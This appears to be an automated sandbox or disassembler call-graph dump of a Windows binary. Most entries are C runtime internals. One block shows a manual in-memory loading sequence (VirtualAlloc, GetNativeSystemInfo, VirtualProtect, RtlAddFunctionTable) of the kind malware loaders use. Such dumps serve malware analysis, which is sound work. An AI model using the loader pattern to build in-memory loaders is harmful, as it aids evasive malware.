18292->18294 18293->18292 18295 7ffa52475180 __SehTransFilter 38 API calls 18293->18295 18296 7ffa52474727 18294->18296 18295->18293 18296->18289 18297 7ffa5246e500 __GetUnwindTryBlock 37 API calls 18296->18297 18298 7ffa52474767 18297->18298 18299 7ffa5246edc0 __SehTransFilter 9 API calls 18298->18299 18299->18289 17199 7ffa524712e3 LoadLibraryW 17200 7ffa524712fd 17199->17200 17201 7ffa52471304 GetProcAddress 17199->17201 17203 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17200->17203 17201->17200 17202 7ffa5247132a 7 API calls 17201->17202 17204 7ffa524713d5 17202->17204 17205 7ffa524713b3 GetProcAddress EncodePointer 17202->17205 17206 7ffa5247157a 17203->17206 17207 7ffa524713f9 DecodePointer DecodePointer 17204->17207 17209 7ffa52471428 DecodePointer 17204->17209 17205->17204 17207->17209 17209->17200 18300 7ffa5246c990 18304 7ffa52464980 18300->18304 18302 7ffa5246c9b8 EncodePointer 18303 7ffa5246c9e5 18302->18303 18305 7ffa524649cb _calloc_dbg_impl 18304->18305 18305->18302 17210 7ffa5247df8d 17212 7ffa5247dfbb 17210->17212 17211 7ffa5247eadf 17214 7ffa5247ef10 25 API calls 17211->17214 17212->17211 17213 7ffa5247eec0 25 API calls 17212->17213 17222 7ffa5247da75 17212->17222 17213->17211 17215 7ffa5247eafd 17214->17215 17216 7ffa5247eb33 17215->17216 17219 7ffa5247eec0 25 API calls 17215->17219 17217 7ffa5247ec29 17216->17217 17231 7ffa5247eb49 _CrtMemDumpAllObjectsSince 17216->17231 17220 7ffa5247ebda 17217->17220 17221 7ffa5247ef10 25 API calls 17217->17221 17218 7ffa5247eca1 17224 7ffa5246bd70 _invalid_parameter 17 API calls 17218->17224 17226 7ffa5247dbe9 _LocaleUpdate::~_LocaleUpdate 17218->17226 17219->17216 17220->17222 17223 7ffa5247eec0 25 API calls 17220->17223 17221->17220 17222->17218 17225 7ffa5247dbb5 17222->17225 17223->17222 17224->17226 17229 7ffa5246bd70 _invalid_parameter 17 API calls 17225->17229 17227 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17226->17227 17228 7ffa5247ed9e 17227->17228 17229->17226 17230 7ffa5247f000 wcsxfrm 2 API calls 17230->17231 17231->17220 17231->17230 17232 7ffa5247ee40 25 API calls 17231->17232 17232->17231 16459 7ffa52464399 16460 7ffa524643a6 16459->16460 16462 7ffa52464377 16459->16462 16462->16459 16462->16460 16463 7ffa5246abb0 DecodePointer 16462->16463 16464 7ffa5246abd3 16463->16464 16464->16462 16472 7ffa52463599 16475 7ffa52468900 16472->16475 16474 7ffa5246359e 16476 7ffa52468920 16475->16476 16477 7ffa52468936 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 16475->16477 16476->16474 16478 7ffa524689de 16477->16478 16478->16476 18786 7ffa52474a95 18787 7ffa52474aad __SehTransFilter 18786->18787 18788 7ffa52475180 __SehTransFilter 38 API calls 18787->18788 18789 7ffa52474c2b 18787->18789 18788->18789 18790 7ffa52472695 18792 7ffa524726a0 18790->18792 18791 7ffa524726ab 18792->18791 18793 7ffa5246bd70 _invalid_parameter 17 API calls 18792->18793 18793->18791 17233 7ffa52475393 17234 7ffa524753a0 17233->17234 17235 7ffa524753cc 17234->17235 17236 7ffa524753b4 __SehTransFilter 17234->17236 17243 7ffa524754a0 RaiseException 17235->17243 17242 7ffa524754a0 RaiseException 17236->17242 17238 7ffa524753ca 17244 7ffa5246ed30 17238->17244 17241 7ffa524753e1 _IsExceptionObjectToBeDestroyed __SehTransFilter 17242->17238 17243->17238 17245 7ffa5246ed3e 17244->17245 17247 7ffa5246ed4c 17245->17247 17250 7ffa5246cf80 DecodePointer 17245->17250 17248 7ffa5246ed88 17247->17248 17249 7ffa5246cf80 _inconsistency 36 API calls 17247->17249 17248->17241 17249->17248 17251 7ffa5246cf9e 17250->17251 17252 7ffa5246cf50 terminate 35 API calls 17251->17252 17253 7ffa5246cfa9 17252->17253 17253->17247 17965 7ffa5246c080 HeapValidate 17966 7ffa5246c0a2 17965->17966 18319 7ffa5247b580 18320 7ffa5247b5fa 18319->18320 18321 7ffa5247b6cb 18320->18321 18322 7ffa5247b676 18320->18322 18323 7ffa5247afb0 _fflush_nolock 17 API calls 18321->18323 18325 7ffa5247b6fe 18321->18325 18324 7ffa5246bd70 _invalid_parameter 17 API calls 18322->18324 18323->18325 18329 7ffa5247b6aa _LocaleUpdate::~_LocaleUpdate 18324->18329 18326 7ffa5247b84d 18325->18326 18332 7ffa5247b8a2 18325->18332 18327 7ffa5246bd70 _invalid_parameter 17 API calls 18326->18327 18327->18329 18328 7ffa5247b915 18333 7ffa5246bd70 _invalid_parameter 17 API calls 18328->18333 18330 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18329->18330 18331 7ffa5247cd90 18330->18331 18332->18328 18335 7ffa5247b96a 18332->18335 18333->18329 18334 7ffa5247cc93 18334->18329 18336 7ffa5246bd70 _invalid_parameter 17 API calls 18334->18336 18335->18334 18337 7ffa5247bada 18335->18337 18336->18329 18338 7ffa5246bd70 _invalid_parameter 17 API calls 18337->18338 18338->18329 16651 950000 16652 950183 16651->16652 16653 95043e VirtualAlloc 16652->16653 16656 950462 16653->16656 16654 950531 GetNativeSystemInfo 16655 95056d VirtualAlloc 16654->16655 16659 950a7b 16654->16659 16657 95058b 16655->16657 16656->16654 16656->16659 16658 950a00 16657->16658 16661 9509d9 VirtualProtect 16657->16661 16658->16659 16660 950a56 RtlAddFunctionTable 16658->16660 16660->16659 16661->16657 17967 7ffa524610b0 17968 7ffa524610da 17967->17968 17969 7ffa524610fc 17968->17969 17973 7ffa52461000 GetThreadLocale GetDateFormatA 17968->17973 17971 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17969->17971 17972 7ffa5246112c 17971->17972 17974 7ffa5246105b 17973->17974 17975 7ffa52461062 GetThreadLocale GetTimeFormatA 17973->17975 17974->17969 17975->17974 17254 7ffa52463faa 17255 7ffa52463e30 LeaveCriticalSection 17254->17255 17256 7ffa52463fb6 GetCurrentThreadId 17255->17256 17257 7ffa52463fea SetLastError 17256->17257 17262 7ffa5247a7a0 17268 7ffa5247a61f 17262->17268 17263 7ffa5247a726 WideCharToMultiByte 17264 7ffa5247a791 GetLastError 17263->17264 17263->17268 17267 7ffa5247a887 _dosmaperr __doserrno 17264->17267 17265 7ffa5247a7b0 WriteFile 17265->17268 17269 7ffa5247a857 GetLastError 17265->17269 17266 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17270 7ffa5247a9f5 17266->17270 17267->17266 17268->17263 17268->17265 17268->17267 17269->17268 17993 7ffa52472c9f 17994 7ffa52472ca6 17993->17994 17996 7ffa52472caf 17993->17996 17995 7ffa5246bd70 _invalid_parameter 17 API calls 17994->17995 17994->17996 17995->17996 17997 7ffa5247809f 17998 7ffa524780b0 _calloc_dbg_impl 17997->17998 17999 7ffa52478145 _calloc_dbg_impl 17997->17999 17999->17998 18000 7ffa5246bd70 _invalid_parameter 17 API calls 17999->18000 18000->17998 16662 7ffa5246aca8 16663 7ffa5246acb2 16662->16663 16664 7ffa524674e0 __crtExitProcess 3 API calls 16663->16664 16665 7ffa5246acbc RtlAllocateHeap 16664->16665 18385 7ffa52480550 18386 7ffa5248055e 18385->18386 18387 7ffa52480575 18385->18387 18386->18387 18388 7ffa52480568 CloseHandle 18386->18388 18388->18387 17310 7ffa5246cb4f 17314 7ffa5246cb5c 17310->17314 17311 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17312 7ffa5246cf0f 17311->17312 17313 7ffa5246cbeb GetStdHandle 17315 7ffa5246cc94 17313->17315 17317 7ffa5246cc07 std::exception::_Copy_str 17313->17317 17314->17313 17314->17315 17316 7ffa5246cc99 17314->17316 17315->17311 17316->17315 17339 7ffa52471640 17316->17339 17317->17315 17319 7ffa5246cc73 WriteFile 17317->17319 17319->17315 17320 7ffa5246cd10 17321 7ffa52467ff0 _invoke_watson_if_error 16 API calls 17320->17321 17322 7ffa5246cd3d GetModuleFileNameW 17321->17322 17323 7ffa5246cd68 17322->17323 17327 7ffa5246cdb1 17322->17327 17324 7ffa52471640 17 API calls 17323->17324 17325 7ffa5246cd84 17324->17325 17328 7ffa52467ff0 _invoke_watson_if_error 16 API calls 17325->17328 17326 7ffa5246ce5e 17359 7ffa52472d80 17326->17359 17327->17326 17349 7ffa52473380 17327->17349 17328->17327 17330 7ffa5246ce76 17332 7ffa52467ff0 _invoke_watson_if_error 16 API calls 17330->17332 17334 7ffa5246cea3 17332->17334 17333 7ffa5246ce31 17335 7ffa52467ff0 _invoke_watson_if_error 16 API calls 17333->17335 17336 7ffa52472d80 17 API calls 17334->17336 17335->17326 17337 7ffa5246ceb9 17336->17337 17338 7ffa52467ff0 _invoke_watson_if_error 16 API calls 17337->17338 17338->17315 17341 7ffa52471661 17339->17341 17340 7ffa524716c2 17342 7ffa5246bd70 _invalid_parameter 17 API calls 17340->17342 17341->17340 17343 7ffa52471700 _calloc_dbg_impl 17341->17343 17345 7ffa524716f6 _calloc_dbg_impl 17342->17345 17344 7ffa524717f4 17343->17344 17346 7ffa52471832 _calloc_dbg_impl 17343->17346 17347 7ffa5246bd70 _invalid_parameter 17 API calls 17344->17347 17345->17320 17346->17345 17348 7ffa5246bd70 _invalid_parameter 17 API calls 17346->17348 17347->17345 17348->17345 17350 7ffa524733a6 17349->17350 17351 7ffa5247342f 17350->17351 17353 7ffa5247346d _calloc_dbg_impl 17350->17353 17356 7ffa524733bc _calloc_dbg_impl 17350->17356 17352 7ffa5246bd70 _invalid_parameter 17 API calls 17351->17352 17352->17356 17354 7ffa524735fb 17353->17354 17353->17356 17357 7ffa52473639 _calloc_dbg_impl 17353->17357 17355 7ffa5246bd70 _invalid_parameter 17 API calls 17354->17355 17355->17356 17356->17333 17357->17356 17358 7ffa5246bd70 _invalid_parameter 17 API calls 17357->17358 17358->17356 17361 7ffa52472da1 17359->17361 17360 7ffa52472e02 17362 7ffa5246bd70 _invalid_parameter 17 API calls 17360->17362 17361->17360 17363 7ffa52472e40 _calloc_dbg_impl 17361->17363 17366 7ffa52472e36 _calloc_dbg_impl 17362->17366 17364 7ffa52472f34 17363->17364 17368 7ffa52472f72 _calloc_dbg_impl 17363->17368 17367 7ffa5246bd70 _invalid_parameter 17 API calls 17364->17367 17365 7ffa524730b5 17369 7ffa5246bd70 _invalid_parameter 17 API calls 17365->17369 17366->17330 17367->17366 17368->17365 17370 7ffa524730f3 _calloc_dbg_impl 17368->17370 17369->17366 17370->17366 17371 7ffa5246bd70 _invalid_parameter 17 API calls 17370->17371 17371->17366 18021 7ffa5246d04a 18022 7ffa5246d1d8 DecodePointer 18021->18022 18023 7ffa5246d1e8 18022->18023 18024 7ffa52467090 _exit 33 API calls 18023->18024 18025 7ffa5246d209 18023->18025 18029 7ffa5246d1f0 18023->18029 18024->18025 18027 7ffa5246d289 18025->18027 18030 7ffa52463d00 RtlEncodePointer 18025->18030 18027->18029 18031 7ffa52469360 LeaveCriticalSection 18027->18031 18030->18027 18031->18029 17372 7ffa52465357 17375 7ffa52469360 LeaveCriticalSection 17372->17375 17374 7ffa52465361 17375->17374 18037 7ffa5246a057 18038 7ffa5246a061 18037->18038 18039 7ffa5246a234 18038->18039 18045 7ffa5246a08e __initmbctable 18038->18045 18041 7ffa5246a25d IsValidCodePage 18039->18041 18044 7ffa5246a22d __initmbctable 18039->18044 18040 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18043 7ffa5246a470 18040->18043 18042 7ffa5246a27b GetCPInfo 18041->18042 18041->18044 18042->18044 18046 7ffa5246a295 __initmbctable 18042->18046 18044->18040 18047 7ffa5246a5e0 __initmbctable 19 API calls 18045->18047 18048 7ffa5246a5e0 __initmbctable 19 API calls 18046->18048 18047->18044 18048->18044 18049 7ffa52465854 18050 7ffa5246585b _calloc_dbg_impl 18049->18050 18051 7ffa5246c020 _free_base 2 API calls 18050->18051 18052 7ffa524659d5 18051->18052 18053 7ffa5247dc41 18054 7ffa5247ee40 25 API calls 18053->18054 18055 7ffa5247da75 18054->18055 18057 7ffa5247eca1 18055->18057 18061 7ffa5247dbb5 18055->18061 18056 7ffa5247dbe9 _LocaleUpdate::~_LocaleUpdate 18059 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18056->18059 18057->18056 18058 7ffa5246bd70 _invalid_parameter 17 API calls 18057->18058 18058->18056 18060 7ffa5247ed9e 18059->18060 18062 7ffa5246bd70 _invalid_parameter 17 API calls 18061->18062 18062->18056 18812 7ffa52469240 18813 7ffa5246924d 18812->18813 18814 7ffa5246925f 18812->18814 18815 7ffa52469281 InitializeCriticalSectionAndSpinCount 18814->18815 18816 7ffa52469295 18814->18816 18815->18816 18818 7ffa52469360 LeaveCriticalSection 18816->18818 18818->18813 18819 7ffa5246ae40 18820 7ffa5246d490 std::exception::_Copy_str 17 API calls 18819->18820 18821 7ffa5246ae59 18820->18821 18822 7ffa52467ff0 _invoke_watson_if_error 16 API calls 18821->18822 18823 7ffa5246ae86 std::exception::_Copy_str 18822->18823 18824 7ffa52470fd0 17 API calls 18823->18824 18827 7ffa5246af3a std::exception::_Copy_str 18823->18827 18825 7ffa5246af0d 18824->18825 18826 7ffa52467ff0 _invoke_watson_if_error 16 API calls 18825->18826 18826->18827 18828 7ffa52466ea0 _invoke_watson_if_oneof 16 API calls 18827->18828 18830 7ffa5246b2e0 18827->18830 18828->18830 18829 7ffa5246b33e 18831 7ffa52470cc0 25 API calls 18829->18831 18830->18829 18832 7ffa5246d490 std::exception::_Copy_str 17 API calls 18830->18832 18834 7ffa5246b358 18831->18834 18833 7ffa5246b311 18832->18833 18835 7ffa52467ff0 _invoke_watson_if_error 16 API calls 18833->18835 18836 7ffa5246b37d 18834->18836 18837 7ffa5246cff0 terminate 34 API calls 18834->18837 18835->18829 18840 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18836->18840 18838 7ffa5246b373 18837->18838 18839 7ffa52467090 _exit 33 API calls 18838->18839 18839->18836 18841 7ffa5246b3a0 18840->18841 18063 7ffa52481040 18066 7ffa5246e8f0 18063->18066 18065 7ffa5248108f 18067 7ffa5246e90d 18066->18067 18068 7ffa52473cc0 __SehTransFilter 39 API calls 18067->18068 18069 7ffa5246e980 18068->18069 18069->18065 18842 7ffa52480e40 18843 7ffa52480e50 18842->18843 18844 7ffa52480e5e 18842->18844 18843->18844 18845 7ffa52463e00 3 API calls 18843->18845 18845->18844 16551 7ffa52468040 16552 7ffa5246805b GetModuleFileNameA 16551->16552 16553 7ffa52468056 16551->16553 16555 7ffa52468083 16552->16555 16556 7ffa5246aa40 16553->16556 16557 7ffa5246aa57 16556->16557 16558 7ffa5246aa4d 16556->16558 16557->16552 16560 7ffa52469c10 16558->16560 16561 7ffa52469c2a 16560->16561 16570 7ffa52469b10 16561->16570 16563 7ffa52469c34 16574 7ffa52469f20 16563->16574 16565 7ffa52469ecd 16565->16557 16566 7ffa52469c51 16566->16565 16580 7ffa5246a000 16566->16580 16568 7ffa52469ce8 16568->16565 16593 7ffa52469360 LeaveCriticalSection 16568->16593 16572 7ffa52469b19 16570->16572 16571 7ffa52469bde 16571->16563 16572->16571 16594 7ffa52469360 LeaveCriticalSection 16572->16594 16575 7ffa52469f49 16574->16575 16576 7ffa52469f81 16575->16576 16577 7ffa52469f5b GetOEMCP 16575->16577 16578 7ffa52469f79 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16576->16578 16579 7ffa52469f88 GetACP 16576->16579 16577->16578 16578->16566 16579->16578 16581 7ffa52469f20 __initmbctable 2 API calls 16580->16581 16582 7ffa5246a028 16581->16582 16583 7ffa5246a234 16582->16583 16588 7ffa5246a039 __initmbctable 16582->16588 16589 7ffa5246a08e __initmbctable 16582->16589 16586 7ffa5246a25d IsValidCodePage 16583->16586 16583->16588 16584 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16585 7ffa5246a470 16584->16585 16585->16568 16587 7ffa5246a27b GetCPInfo 16586->16587 16586->16588 16587->16588 16591 7ffa5246a295 __initmbctable 16587->16591 16588->16584 16590 7ffa5246a5e0 __initmbctable 19 API calls 16589->16590 16590->16588 16595 7ffa5246a5e0 GetCPInfo 16591->16595 16593->16565 16594->16571 16599 7ffa5246a61f 16595->16599 16604 7ffa5246a7dc 16595->16604 16596 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16597 7ffa5246aa30 16596->16597 16597->16588 16598 7ffa5246f4d0 _CrtMemDumpAllObjectsSince_stat 3 API calls 16600 7ffa5246a734 16598->16600 16599->16598 16606 7ffa5246ef00 16600->16606 16602 7ffa5246a788 16603 7ffa5246ef00 __initmbctable 7 API calls 16602->16603 16603->16604 16604->16596 16605 7ffa5246a80a 16604->16605 16605->16588 16607 7ffa5246ef2c _CrtMemDumpAllObjectsSince 16606->16607 16610 7ffa5246efb0 16607->16610 16609 7ffa5246ef8e _LocaleUpdate::~_LocaleUpdate 16609->16602 16611 7ffa5246efd4 __initmbctable 16610->16611 16612 7ffa5246f068 MultiByteToWideChar 16611->16612 16617 7ffa5246f0ac malloc _MarkAllocaS 16612->16617 16618 7ffa5246f0a5 _CrtMemDumpAllObjectsSince_stat 16612->16618 16613 7ffa5246f122 MultiByteToWideChar 16614 7ffa5246f164 LCMapStringW 16613->16614 16613->16618 16615 7ffa5246f1a8 16614->16615 16614->16618 16616 7ffa5246f1b8 16615->16616 16624 7ffa5246f222 malloc _MarkAllocaS 16615->16624 16616->16618 16619 7ffa5246f1d9 LCMapStringW 16616->16619 16617->16613 16617->16618 16618->16609 16619->16618 16620 7ffa5246f2ac LCMapStringW 16620->16618 16621 7ffa5246f2ea 16620->16621 16622 7ffa5246f341 WideCharToMultiByte 16621->16622 16623 7ffa5246f2f4 WideCharToMultiByte 16621->16623 16622->16618 16623->16618 16624->16618 16624->16620 18393 7ffa52461140 18395 7ffa5246116a 18393->18395 18394 7ffa5246118c 18398 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18394->18398 18395->18394 18396 7ffa5246119a FileTimeToSystemTime 18395->18396 18396->18394 18397 7ffa524611ae 18396->18397 18399 7ffa52461000 4 API calls 18397->18399 18400 7ffa524611d0 18398->18400 18399->18394 18401 7ffa5247f53e 18402 7ffa5247f55c 18401->18402 18403 7ffa5247f74d 18402->18403 18404 7ffa52480170 23 API calls 18402->18404 18405 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18403->18405 18404->18403 18406 7ffa5247f7c5 18405->18406 18846 7ffa52467640 GetStartupInfoW 18856 7ffa52467676 _calloc_dbg 18846->18856 18847 7ffa52467689 18848 7ffa52467ce0 SetHandleCount 18848->18847 18849 7ffa52467ab9 18849->18848 18850 7ffa52467b95 GetStdHandle 18849->18850 18852 7ffa52467c7b 18849->18852 18851 7ffa52467bb9 18850->18851 18850->18852 18851->18852 18853 7ffa52467bc8 GetFileType 18851->18853 18852->18848 18853->18852 18854 7ffa52467beb InitializeCriticalSectionAndSpinCount 18853->18854 18854->18847 18854->18852 18856->18847 18856->18849 18857 7ffa52467a19 GetFileType 18856->18857 18858 7ffa52467a32 InitializeCriticalSectionAndSpinCount 18856->18858 18857->18849 18857->18858 18858->18847 18858->18849 18070 7ffa5246443c 18071 7ffa5246444c 18070->18071 18074 7ffa52469360 LeaveCriticalSection 18071->18074 18073 7ffa524648be 18074->18073 18859 7ffa52473e3b 18860 7ffa52473ec7 18859->18860 18861 7ffa5246e790 __SehTransFilter 37 API calls 18860->18861 18862 7ffa52473ee4 18861->18862 16222 7ffa52468670 GetEnvironmentStringsW 16223 7ffa52468690 16222->16223 16224 7ffa52468697 WideCharToMultiByte 16222->16224 16226 7ffa5246875f FreeEnvironmentStringsW 16224->16226 16227 7ffa52468733 16224->16227 16226->16223 16227->16226 16228 7ffa5246876e WideCharToMultiByte 16227->16228 16229 7ffa524687aa 16228->16229 16230 7ffa524687c2 FreeEnvironmentStringsW 16228->16230 16229->16230 16230->16223 17391 7ffa52481370 17392 7ffa5247af60 _unlock_file2 2 API calls 17391->17392 17393 7ffa52481390 17392->17393 16231 7ffa52463471 16232 7ffa524634bc 16231->16232 16233 7ffa5246347a 16231->16233 16234 7ffa52463496 16233->16234 16253 7ffa524670b0 16233->16253 16243 7ffa52467d00 16234->16243 16241 7ffa524634a5 16241->16232 16242 7ffa52463e00 3 API calls 16241->16242 16242->16232 16245 7ffa52467d0e 16243->16245 16244 7ffa5246349b 16247 7ffa52463e00 16244->16247 16245->16244 16246 7ffa52467d87 DeleteCriticalSection 16245->16246 16246->16245 16248 7ffa52463e0d FlsFree 16247->16248 16249 7ffa52463e23 16247->16249 16248->16249 16256 7ffa524690b0 16249->16256 16252 7ffa524688d0 HeapDestroy 16252->16241 16262 7ffa52467280 16253->16262 16259 7ffa524690be 16256->16259 16257 7ffa524690fd DeleteCriticalSection 16257->16259 16258 7ffa524634a0 16258->16252 16259->16257 16260 7ffa5246914d 16259->16260 16260->16258 16261 7ffa52469196 DeleteCriticalSection 16260->16261 16261->16260 16263 7ffa52467296 _exit 16262->16263 16264 7ffa524672c7 DecodePointer 16263->16264 16271 7ffa52467368 _initterm 16263->16271 16282 7ffa5246744e 16263->16282 16266 7ffa524672e5 DecodePointer 16264->16266 16264->16271 16265 7ffa5246745e 16268 7ffa524670c3 16265->16268 16269 7ffa52467520 _exit LeaveCriticalSection 16265->16269 16283 7ffa52467314 16266->16283 16268->16234 16270 7ffa52467479 16269->16270 16309 7ffa524674e0 16270->16309 16271->16282 16286 7ffa52466210 16271->16286 16276 7ffa5246736d DecodePointer 16285 7ffa52463d00 RtlEncodePointer 16276->16285 16279 7ffa52467449 16299 7ffa52466f10 16279->16299 16281 7ffa52467391 DecodePointer DecodePointer 16281->16283 16282->16265 16306 7ffa52467520 16282->16306 16283->16271 16283->16276 16283->16281 16284 7ffa52463d00 RtlEncodePointer 16283->16284 16284->16283 16285->16283 16289 7ffa52466229 16286->16289 16287 7ffa5246628f 16312 7ffa5246bd70 DecodePointer 16287->16312 16288 7ffa524662cb 16316 7ffa52469360 LeaveCriticalSection 16288->16316 16289->16287 16289->16288 16292 7ffa524662c3 16292->16282 16293 7ffa52467100 16292->16293 16294 7ffa52467112 16293->16294 16295 7ffa524671e4 DecodePointer 16294->16295 16296 7ffa524671fe 16295->16296 16341 7ffa52463d00 RtlEncodePointer 16296->16341 16298 7ffa52467219 16298->16279 16342 7ffa524663e0 16299->16342 16301 7ffa52466f33 16302 7ffa52466f8e 16301->16302 16350 7ffa52466660 16301->16350 16304 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16302->16304 16305 7ffa52466fa7 16304->16305 16305->16282 16418 7ffa52469360 LeaveCriticalSection 16306->16418 16308 7ffa5246752e 16308->16265 16419 7ffa52467490 GetModuleHandleW 16309->16419 16313 7ffa5246bdd0 16312->16313 16314 7ffa5246bdac 16312->16314 16317 7ffa5246be00 16313->16317 16314->16292 16316->16292 16320 7ffa5246be50 16317->16320 16321 7ffa5246be81 _CrtMemDumpAllObjectsSince_stat 16320->16321 16322 7ffa5246be8d RtlCaptureContext RtlLookupFunctionEntry 16320->16322 16321->16322 16323 7ffa5246bf1c RtlVirtualUnwind 16322->16323 16324 7ffa5246bf64 16322->16324 16325 7ffa5246bf84 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16323->16325 16324->16325 16328 7ffa5246bfde _CrtMemDumpAllObjectsSince_stat 16325->16328 16327 7ffa5246be2d GetCurrentProcess TerminateProcess 16327->16314 16329 7ffa52463280 16328->16329 16330 7ffa52463289 16329->16330 16331 7ffa52463294 16330->16331 16332 7ffa52463720 RtlCaptureContext RtlLookupFunctionEntry 16330->16332 16331->16327 16333 7ffa524637a5 16332->16333 16334 7ffa52463764 RtlVirtualUnwind 16332->16334 16335 7ffa524637c7 IsDebuggerPresent 16333->16335 16334->16335 16340 7ffa52468d90 16335->16340 16337 7ffa52463826 SetUnhandledExceptionFilter UnhandledExceptionFilter 16338 7ffa5246384e GetCurrentProcess TerminateProcess 16337->16338 16339 7ffa52463844 _CrtMemDumpAllObjectsSince_stat 16337->16339 16338->16327 16339->16338 16340->16337 16341->16298 16344 7ffa524663f1 16342->16344 16343 7ffa52466447 16345 7ffa5246bd70 _invalid_parameter 17 API calls 16343->16345 16344->16343 16347 7ffa52466480 16344->16347 16346 7ffa5246647b 16345->16346 16346->16301 16349 7ffa52466504 16347->16349 16354 7ffa52469360 LeaveCriticalSection 16347->16354 16349->16301 16351 7ffa52466681 _CrtMemDumpAllObjectsSince 16350->16351 16355 7ffa52466850 16351->16355 16353 7ffa52466698 _LocaleUpdate::~_LocaleUpdate 16353->16302 16354->16346 16356 7ffa52466871 16355->16356 16357 7ffa52466ba6 16356->16357 16360 7ffa524668ed _CrtIsValidPointer 16356->16360 16385 7ffa52469360 LeaveCriticalSection 16357->16385 16359 7ffa52466bb0 16359->16353 16361 7ffa5246695e IsBadReadPtr 16360->16361 16362 7ffa52466976 16360->16362 16371 7ffa5246692f 16360->16371 16361->16362 16363 7ffa52466ad2 16362->16363 16364 7ffa52466a29 16362->16364 16365 7ffa52466b2d 16363->16365 16366 7ffa52466add 16363->16366 16367 7ffa52466abe 16364->16367 16368 7ffa52466a86 IsBadReadPtr 16364->16368 16365->16371 16372 7ffa52466bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16365->16372 16370 7ffa52466bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16366->16370 16373 7ffa52466bf0 16367->16373 16368->16367 16368->16371 16370->16371 16371->16353 16372->16371 16374 7ffa52466c28 16373->16374 16375 7ffa52466e25 _LocaleUpdate::~_LocaleUpdate 16374->16375 16377 7ffa52466c7a _CrtMemDumpAllObjectsSince 16374->16377 16378 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16375->16378 16376 7ffa52466ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 16390 7ffa5246c0c0 16376->16390 16377->16376 16386 7ffa5246c260 16377->16386 16379 7ffa52466e89 16378->16379 16379->16371 16382 7ffa52466e12 16382->16371 16383 7ffa52466dc7 16383->16382 16393 7ffa52466ea0 16383->16393 16385->16359 16387 7ffa5246c286 _CrtMemDumpAllObjectsSince wcsxfrm 16386->16387 16389 7ffa5246c29d _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16387->16389 16397 7ffa5246f4d0 16387->16397 16389->16376 16408 7ffa52472260 16390->16408 16392 7ffa5246c103 16392->16383 16394 7ffa52466ed1 16393->16394 16395 7ffa52466ebd 16393->16395 16394->16382 16395->16394 16396 7ffa5246be00 _invoke_watson_if_oneof 16 API calls 16395->16396 16396->16394 16398 7ffa5246f4f9 _CrtMemDumpAllObjectsSince 16397->16398 16401 7ffa5246f570 16398->16401 16400 7ffa5246f550 _LocaleUpdate::~_LocaleUpdate 16400->16389 16402 7ffa5246f599 MultiByteToWideChar 16401->16402 16404 7ffa5246f60b malloc _calloc_dbg_impl _MarkAllocaS 16402->16404 16407 7ffa5246f604 _CrtMemDumpAllObjectsSince_stat 16402->16407 16405 7ffa5246f68b MultiByteToWideChar 16404->16405 16404->16407 16406 7ffa5246f6ca GetStringTypeW 16405->16406 16405->16407 16406->16407 16407->16400 16409 7ffa5247228b 16408->16409 16410 7ffa524722e1 16409->16410 16413 7ffa5247231f 16409->16413 16411 7ffa5246bd70 _invalid_parameter 17 API calls 16410->16411 16415 7ffa52472315 _calloc_dbg_impl 16411->16415 16412 7ffa52472385 16414 7ffa5246bd70 _invalid_parameter 17 API calls 16412->16414 16413->16412 16416 7ffa524723c3 _calloc_dbg_impl 16413->16416 16414->16415 16415->16392 16416->16415 16417 7ffa5246bd70 _invalid_parameter 17 API calls 16416->16417 16417->16415 16418->16308 16420 7ffa524674d1 ExitProcess 16419->16420 16421 7ffa524674b2 GetProcAddress 16419->16421 16421->16420 16496 7ffa52468860 HeapCreate 16497 7ffa52468891 GetVersion 16496->16497 16498 7ffa5246888d 16496->16498 16499 7ffa524688c1 16497->16499 16500 7ffa524688a7 HeapSetInformation 16497->16500 16499->16498 16500->16499 18863 7ffa52475260 18864 7ffa52475296 __SehTransFilter _CreateFrameInfo 18863->18864 18865 7ffa5246ed30 _FindAndUnlinkFrame 36 API calls 18864->18865 18866 7ffa524753e1 _IsExceptionObjectToBeDestroyed __SehTransFilter 18865->18866 18434 7ffa52481160 18437 7ffa52474e90 18434->18437 18436 7ffa52481179 18438 7ffa52474ebb 18437->18438 18439 7ffa52474ecf 18437->18439 18438->18439 18440 7ffa5246cf50 terminate 35 API calls 18438->18440 18439->18436 18440->18439 18099 7ffa5246405b 18101 7ffa5246406e 18099->18101 18105 7ffa52469360 LeaveCriticalSection 18101->18105 18103 7ffa52464224 18104 7ffa524641bb _updatetlocinfoEx_nolock 18106 7ffa52469360 LeaveCriticalSection 18104->18106 18105->18104 18106->18103 18441 7ffa5247595c 18442 7ffa5246cf50 terminate 35 API calls 18441->18442 18443 7ffa52475961 18442->18443 18867 7ffa5246425a FlsGetValue FlsSetValue 18868 7ffa52464283 18867->18868 18444 7ffa5246e55a 18445 7ffa5246e564 18444->18445 18446 7ffa5246e5c2 RtlLookupFunctionEntry 18445->18446 18447 7ffa5246e601 18445->18447 18446->18447 17405 7ffa5247bb66 17406 7ffa5247bb78 _CrtMemDumpAllObjectsSince wcsxfrm 17405->17406 17407 7ffa5247bc46 17406->17407 17410 7ffa5247b99c 17406->17410 17408 7ffa5246bd70 _invalid_parameter 17 API calls 